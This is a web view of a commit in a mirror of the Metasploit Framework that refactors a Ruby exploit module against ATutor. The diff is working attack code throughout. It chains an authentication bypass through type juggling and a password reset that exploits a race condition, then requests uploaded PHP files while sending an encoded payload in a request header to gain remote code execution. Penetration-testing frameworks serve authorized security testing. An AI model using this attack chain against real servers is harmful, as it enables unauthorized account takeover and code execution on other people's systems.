infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update atutor_filemanager_traversal

bug/bundler_fix
wchen-r7 2016-03-22 14:42:36 -05:00
parent 3842009ffe
commit 9cb43f2153
1 changed files with 19 additions and 27 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

46
modules/exploits/linux/http/atutor_filemanager_traversal.rb
View File

@ -129,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.txt"),
})
if res.code == 200 and res.body =~ /#{@test_string}/
if res and res.code == 200 and res.body =~ /#{@test_string}/
return true
end
return false
@ -141,34 +141,30 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, "jscripts", "ATutor_js.php"),
})
@webroot = "/"
@webroot << $1 if res.body =~ /\<b\>\/(.*)jscripts\/ATutor_js\.php\<\/b\> /
@webroot << $1 if res and res.body =~ /\<b\>\/(.*)jscripts\/ATutor_js\.php\<\/b\> /
if @webroot != "/"
return true
end
return false
end
def exec_code
# pwnage
res = nil
def call_php(ext)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.pht"),
'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.#{ext}"),
'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
}, timeout=0.1)
return res
end
def exec_code
res = nil
res = call_php("pht")
if res == nil
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.phtml"),
'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
}, timeout=0.1)
res = call_php("phtml")
end
if res == nil
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.php4"),
'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
}, timeout=0.1)
res = call_php("php4")
end
end
@ -191,11 +187,7 @@ class MetasploitModule < Msf::Exploit::Remote
return true
end
# unknown failure...
if res && res.body =~ /Missing zlib extensions/
fail_with(Failure::NotVulnerable, 'Server is missing zlib extensions')
else
fail_with(Failure::Unknown, 'Unable to upload php code')
end
fail_with(Failure::Unknown, "Unable to upload php code")
return false
end
@ -209,7 +201,7 @@ class MetasploitModule < Msf::Exploit::Remote
# use that session to leak the username
'agent' => ''
})
username = "#{$1}" if res.body =~ /<span id="login">(.*)<\/span>/
username = "#{$1}" if res and res.body =~ /<span id="login">(.*)<\/span>/
if username
return username
end
@ -251,7 +243,7 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::Unknown, "Unable to exploit the type juggle and bypass authentication")
end
def reset_password()
def reset_password
# this is due to line 79 of password_reminder.php
days = (Time.now.to_i/60/60/24)
# make a semi strong password, we have to encourage security now :->
@ -279,13 +271,13 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::Unknown, "Unable to exploit the TOCTOU and reset the password")
end
def login(username, hash, check=false)
password = Rex::Text.sha1(Rex::Text.sha1(hash))
def login(username, password, check=false)
hash = Rex::Text.sha1(Rex::Text.sha1(password))
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "login.php"),
'vars_post' => {
'form_password_hidden' => password,
'form_password_hidden' => hash,
'form_login' => username,
'submit' => 'Login',
'token' => '',
@ -299,7 +291,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
# auth failed if we land here, bail
if not check
unless check
fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
end
return nil